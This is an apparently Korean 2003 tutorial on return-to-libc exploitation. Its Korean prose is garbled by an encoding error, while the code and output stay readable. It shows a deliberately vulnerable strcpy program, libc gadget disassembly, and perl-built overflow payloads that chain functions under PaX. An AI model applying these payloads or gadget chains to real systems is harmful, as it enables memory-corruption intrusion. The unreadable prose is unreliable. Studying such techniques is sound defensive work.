Return-to-Lib ̿ Լ ϰ ȣ Լ ϱ Mutacker in (ּ: Null@Root & װ Ʈ ȿ ) mutacker@null2root.org, mutacker@mail.hangkong.ac.kr (http://mutacker.null2root.org) /////////////////////////////////////////////////////////////////////////////////////////////// /////// 1. ⿡ ռ ⿡ ռ ׻ ֽô е鿡 帳ϴ. Ī .. ˼մϴ. __) ŷ ο ̳ ߰ϰ ۾ и ȥڼ س⿡ ġ . , ׻ 翡 Ѻְ, ְ Ƴ ʴ е ֱ⿡ ƴѰ ʹ. ٽ ѹ е鿡 縦 ǥѴ. Ư, 츮 "~ 𳪸(O~ MuNaRiSe)"(?)鲲 帳ϴ. - üҸ Null@Root پ Ұ شϴ ۿ÷ξ ֱ ̴. DZ ϸ, Ѵ. Ʋ κ̳ Ż ο ̳ ּ(irc.null2root.org) ˷ֽñ ٶϴ. ⸸ Ư ø̼ǿ õ exploit ʴ´. ƹɷ, ѱ ̳ ϴ(? ձذ ƴ ) Ŀ鿡, ׸ α׷ ϴ ڵ鿡 ׸ Ǿ ϴ ٷ . ְ http://www.null2root.org̸, Ҵ http://www.khdp.org̴. ٸ 쿡 ó Ȯ ־ ϴ ٷ̴. /////////////////////////////////////////////////////////////////////////////////////////////// /////// 2. Ұ +--------------------------------------------------------------------------------------------------------+ | "Return-to-Lib ̿ , Ų Լ Լ ڷ Ѱ ?" | +--------------------------------------------------------------------------------------------------------+ ް Ʈ ڵ带 ʰ Ű Ǿ. , ̵ 鿡 Լ ϰ Լ ϴ ؼ Ұ ϰ ִ. , ε Լ ϰ ޾Ƽ Լ ڰ Ѱ־ ϴ 쿡 ذ Ϲ ۵ ĿԴ. stack buffer overflow ߻ϴ ȯϿ Return-to-Lib( RTL) ̿Ϸ ϰ Լ Ű ڰ ϴ ҰϷ Ѵ. ۼϿ "Stack buffer overflow ̿Ͽ Text ڵ带 ÷ Ű" Ͽ о Ѵ. -- ȯ (1) ý۰ ü mutacker ~/newdoc> uname -a Linux kof 2.4.20-PaX #2 SMP Sat Feb 22 06:59:22 KST 2003 i686 unknown (2) PaX patch ȯ http://pageexec.virtualave.net PaX patch [*] Paging based non-executable pages [ ] Segmentation based non-executable pages [ ] Emulate trampolines [ ] Restrict mprotect() [ ] Disallow ELF text relocations [ ] Address Space Layout Randomization /////////////////////////////////////////////////////////////////////////////////////////////// ////// 3. // print(add()); ȣ ȿ BoF ̿Ͽ ϶. #include <stdio.h> int add() { return 100; } int print(int num) { printf("Good Job : %d\n", num); } int main(int argc, char* argv[]) { char buf[32]; strcpy(buf, argv[1]); printf("buf: %s\n", buf); } print()Լ Ű add()Լ ϰ ޾Ƽ óϴ ̴. , 츮 ˰ ִ Return-to-Lib δ add()Լ ϰ ȹ ִ Ƿ, ̸ ذ ã ߿ϰڴ. 
/////////////////////////////////////////////////////////////////////////////////////////////// ////// 4. м Ǹ ϳ Լ ٸ Լ ȣ , ϰ ȣ Լ ϰ ɱ? %eax Ϳ ǵ شٴ ̴. ̸ ׸ α׷ Ȯ . mutacker ~/newdoc> cat rettest.c int add(int a, int b) { return a+b; } main() { int c; c = add( 100, 200 ); printf("Number : %d\n", c); } mutacker ~/newdoc> objdump -d rettest ..... 08048470
<main>: 8048470: 55 push %ebp 8048471: 89 e5 mov %esp,%ebp 8048473: 83 ec 08 sub $0x8,%esp 8048476: 83 ec 08 sub $0x8,%esp ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 8048479: 68 c8 00 00 00 push $0xc8 804847e: 6a 64 push $0x64 8048480: e8 db ff ff ff call 8048460 <add> 8048485: 83 c4 10 add $0x10,%esp 8048488: 89 c0 mov %eax,%eax 804848a: 89 45 fc mov %eax,0xfffffffc(%ebp) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 804848d: 83 ec 08 sub $0x8,%esp 8048490: ff 75 fc pushl 0xfffffffc(%ebp) 8048493: 68 18 85 04 08 push $0x8048518 8048498: e8 9f fe ff ff call 804833c <_init+0x58> 804849d: 83 c4 10 add $0x10,%esp 80484a0: c9 leave 80484a1: c3 ret ..... ~~~ ~~~ κ ٷ c = add(100, 200); شϴ κ Լ ȣ 804848a: 89 45 fc mov %eax,0xfffffffc(%ebp) κп ϰ(%eax) c شϴ κ 0xfffffffc(%ebp) Ǿ ִ. ! 츮 Լ ϰ %eax͸ ޵Ǿٴ ˾Ҵ. ׷ٸ, Return-to-Lib ȣ Լ ϰ ޵Ǿ ̶ ִ. ̶ %eax ̿ϸ ǰڴٴ ƽ ̴. ׷ٸ, ڵ尡 ƴ RTL ̿ %eax  ȹ ΰ  Լ Ű Ѱ ΰ ǰڴ. ̸ ش α׷ м ణ غ . mutacker ~/newdoc> gcc -o newdoc newdoc.c mutacker ~/newdoc> ldd newdoc libc.so.6 => /lib/i686/libc.so.6 (0x40022000) /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000) Ȳ ش μ εǾ , ΰ ̺귯 Ǿ ̶ ִ. +-----------------------------------------------------------------------------------------+ | "%eax ޸ ϴ ڵ尡 ̺귯 ȿ ұ?" | +-----------------------------------------------------------------------------------------+ ڵ常 Ѵٸ Լ ȣϰ ٷ κп %eax 츮 ϴ ޸ ̵Ű ڵ带 Ű ϴ ۾ ̴. ̸ ̺귯 objdump ̿Ͽ 캸. mutacker ~/newdoc> objdump -d /lib/i686/libc.so.6 .... 00026bd0 <_nl_postload_time>: 26bd0: 55 push %ebp 26bd1: 89 e5 mov %esp,%ebp 26bd3: 53 push %ebx 26bd4: e8 07 fa ff ff call 265e0 <_nl_postload_ctype+0xcc> 26bd9: 81 c3 0b 3e 10 00 add $0x103e0b,%ebx 26bdf: 31 c9 xor %ecx,%ecx 26be1: 31 d2 xor %edx,%edx 26be3: 89 8b 1c 0d 00 00 mov %ecx,0xd1c(%ebx) 26be9: 31 c0 xor %eax,%eax 26beb: 89 93 28 0d 00 00 mov %edx,0xd28(%ebx) 26bf1: 89 83 30 0d 00 00 mov %eax,0xd30(%ebx) 26bf7: 5b pop %ebx 26bf8: 5d pop %ebp 26bf9: c3 ret .... mutacker ~/newdoc> objdump -d /lib/ld-linux.so.2 .... 
(gdb) disassemble _nl_postload_time Dump of assembler code for function _nl_postload_time: 0x40048bd0 <_nl_postload_time>: push %ebp 0x40048bd1 <_nl_postload_time+1>: mov %esp,%ebp 0x40048bd3 <_nl_postload_time+3>: push %ebx 0x40048bd4 <_nl_postload_time+4>: call 0x400485e0 <_nl_postload_ctype+204> 0x40048bd9 <_nl_postload_time+9>: add $0x103e0b,%ebx 0x40048bdf <_nl_postload_time+15>: xor %ecx,%ecx 0x40048be1 <_nl_postload_time+17>: xor %edx,%edx 0x40048be3 <_nl_postload_time+19>: mov %ecx,0xd1c(%ebx) 0x40048be9 <_nl_postload_time+25>: xor %eax,%eax 0x40048beb <_nl_postload_time+27>: mov %edx,0xd28(%ebx) 0x40048bf1 <_nl_postload_time+33>: mov %eax,0xd30(%ebx) 0x40048bf7 <_nl_postload_time+39>: pop %ebx 0x40048bf8 <_nl_postload_time+40>: pop %ebp 0x40048bf9 <_nl_postload_time+41>: ret End of assembler dump. _nl_postload_time ̺귯 Լ ( ãҴ -_-) 츮 ʿ κ Ʒ κп شѴ. 26bf1: 89 83 30 0d 00 00 mov %eax,0xd30(%ebx) -- (1) 26bf7: 5b pop %ebx -- (2) 26bf8: 5d pop %ebp -- (3) 26bf9: c3 ret -- (4) (1) %eax %ebxͰ Ű κ 0xd30 شϴ ϴ κ̴. %ebx 0xbffff2c0 0xd30 ġ ǹǷ 0xbffffff0 ּҿ %eax ִٴ ǹ̰ ǰڴ. 嵥, %ebx  ٲ ΰ? ٷ (2) ִ. (2) û %esp Ű %ebx ̴. 츮 %esp ִٸ, Ư ޸ ġ 0xbffff2c0 ڽ ϴ ޸ ּҰ ־ΰ (2) Ǹ %ebxͿ ϴ ־ ִ ̴. ϴ 帧 (2) ǰ (1) Ǿ , ̸ RTL ̿ 쿡 ʱ , (2), (3), (4) ϰ, ٽ (1), (2), (3), (4) Ű ǰڴ. ü α׷ 帧 26bf7: 5b pop %ebx -- (2) 26bf8: 5d pop %ebp -- (3) 26bf9: c3 ret -- (4) 26bf1: 89 83 30 0d 00 00 mov %eax,0xd30(%ebx) -- (1)' 26bf7: 5b pop %ebx -- (2)' 26bf8: 5d pop %ebp -- (3)' 26bf9: c3 ret -- (4)' ̷ ǰڴ. (4) ּҸ (1)' ν 帧 Ƿ ū Ÿ ̴. ׷ Ȳ ؼ  ٸ? popɾ retɾ %esp Ͱ 4 . , pop ret ؼ %esp ǹǷ ׿ û ־θ ǰڴ. , ñ Ʒ صθ 츮 ϴ %eax ̴. 
| | +---------------------------------+ | %eax ּ - 0xd30 | <- pop %ebx : %ebx +---------------------------------+ | %ebp (߿ ) | <- pop %ebp : %ebp +---------------------------------+ |(1)' ޸ ּҰ(0x40048bf1) | <- ret +---------------------------------+ | %ebx (߿ ) | <- pop %ebx : %ebx +---------------------------------+ | %ebp ( leave chain ) | <- pop %ebp : %ebp +---------------------------------+ | ڵ忡 شϴ ּ | <- ret +---------------------------------+ | | 츮 ϴ ̺귯 ִ Ư ڵ带 ̿Ͽ %eax Ư ޸𸮷 ִ 캸Ҵ. /////////////////////////////////////////////////////////////////////////////////////////////// ////// 5. :) ׷ ణ Ͽ Ư ޸ %eax Ǿ° Ȯ غ . ̸ ϶ dumpcode ̿ϵ ϰڴ. mutacker ~/newdoc> cat tnewdoc.c #include <stdio.h> #include "dumpcode.h" int add() { return 100; } int print(int num) { printf("%d\n", num); } int main(int argc, char* argv[]) { char buf[32]; strcpy(buf, argv[1]); printf("buf: %s\n", buf); dumpcode((char*)0xbffffff0, 16); } void test() { dumpcode((char*)0xbffffff0, 16); } mutacker ~/newdoc> objdump -d ./tnewdoc | grep "<add>" 08048704 <add>: mutacker ~/newdoc> objdump -d ./tnewdoc | grep "<test>" 08048774 <test>: 츮 BoF return address add ּ 0x08048704 ϰ, ϰ, ش ޸𸮰 Ǿ Ȯϱ test ǵ ̴. mutacker ~/newdoc> ./tnewdoc `perl -e 'print "A"x44, "\x04\x87\x04\x08", "\xf7\x8b\x04\x40", "\xc0\xf2\xff\xbf"x2, "\xf1\x8b\x04\x40", "\x74\x87\x04\x08"x3'` buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA??@??@t? t?t? 0xbffffff0 63 00 2e 2f 74 6e 65 77 64 6f 63 00 00 00 00 00 c../tnewdoc..... ~~~~~~~~~~~ 0xbffffff0 64 00 00 00 74 6e 65 77 64 6f 63 00 00 00 00 00 d...tnewdoc..... ~~~~~~~~~~~ Segmentation fault (core dumped) mutacker ~/newdoc> Ϳ!! 츮 ּҿ Ǿ Ȯ ִ. "\xc0\xf2\xff\xbf" ==> 0xbffff2c0 == 0xbffffff0 - 0xd30 0x00000064 == 100 츮 ⿡ testԼ ּ print ּҸ ־. ׸, print ּҰ  + 4 ġ Ű  ̸, ̰ ּҰ "\xc0\xf2\xff\xbf" κп üϸ ̴. !! α׷ ̿Ͽ ׽Ʈ غ. 
mutacker ~/newdoc> objdump -d ./newdoc | grep "<add>" 08048490 <add>: mutacker ~/newdoc> objdump -d ./newdoc | grep "<print>" 0804849c <print>: mutacker ~/newdoc> ./newdoc `perl -e 'print "A"x44, "\x90\x84\x04\x08", "\xf7\x8b\x04\x40", "\xc0\xf2\xff\xbf"x2, "\xf1\x8b\x04\x40", "\xaa\xaa\xaa\xaa", "\xbb\xbb\xbb\xbb", "\x9c\x84\x04\x08", "XXXX", "YYYY"'` buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@??@ Good Job : 0 Segmentation fault (core dumped) mutacker ~/newdoc> gdb newdoc core -q Core was generated by `./newdoc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@? ?@'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/i686/libc.so.6...done. Loaded symbols for /lib/i686/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x4003e11c in __libc_start_main (main=Cannot access memory at address 0xbbbbbbc3 ) at ../sysdeps/generic/libc-start.c:77 77 ../sysdeps/generic/libc-start.c: No such file or directory. in ../sysdeps/generic/libc-start.c (gdb) info reg $ebx $ebp ebx 0xaaaaaaaa -1431655766 ebp 0xbbbbbbbb 0xbbbbbbbb gdb ̿ 캸 츮 Ų ڵ忡 ebx ebp Ǿ Ȯ ִ. Էºκп "YYYY" شϴ û ּҰ ˾Ƴ ߿, ⿡ brute force ̿ϵ ϰڴ. mutacker ~/newdoc> ./newdoc `perl -e 'print "A"x44, "\x90\x84\x04\x08", "\xf7\x8b\x04\x40", "\xf0\xee\xff\xbf"x2, "\xf1\x8b\x04\x40", "\xaa\xaa\xaa\xaa", "\xbb\xbb\xbb\xbb", "\x9c\x84\x04\x08", "XXXX", "YYYY"'` buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?@??@ XXXXYYYY Good Job : 100 Segmentation fault (core dumped) mutacker ~/newdoc> print Ű ġ 0xbffffc20 ̾, 0xd30ŭ Ǿ ϱ 0xbfffeef0 ԷϿ. (Note: every address in this chain is fixed for this one system. The gadget addresses 0x40048bf7 / 0x40048bf1 are the libc.so.6 offsets 0x26bf7 / 0x26bf1 plus the 0x40022000 load base that ldd reported, and the "YYYY" slot 0xbffffc20 was found by brute force; this only works because the PaX configuration in section 2 leaves Address Space Layout Randomization unchecked. With ASLR enabled, or against a different libc build, both the gadget addresses and the stack address must be re-derived, e.g. via an address leak, before the chain can be used.) /////////////////////////////////////////////////////////////////////////////////////////////// ////// 6. Return-to-Lib ̿ , Լ ϰ Լ Ű ϴ ̰ ִ. ̸ Return-to-Lib ̿Ͽ ε ڵ峪 ̿ Լ ϰ ޾ Լ Ǿµ ʼ ׿ ó . ̸ ̿ ϳ ̵ ϰڴ. :) λ Ѱμ 𸣰ڴ. :) ׷ е ǽ 鼭.. /////////////////////////////////////////////////////////////////////////////////////////////// ////// 7. 1. Stack buffer overflow ̿Ͽ Text ڵ带 ÷ Ű?: http://www.kof.co.kr/breakpax.txt 2. 
The advanced return-into-lib(c) exploits : Phrack issue 58, article 4 3. Ÿ bof۵ ^^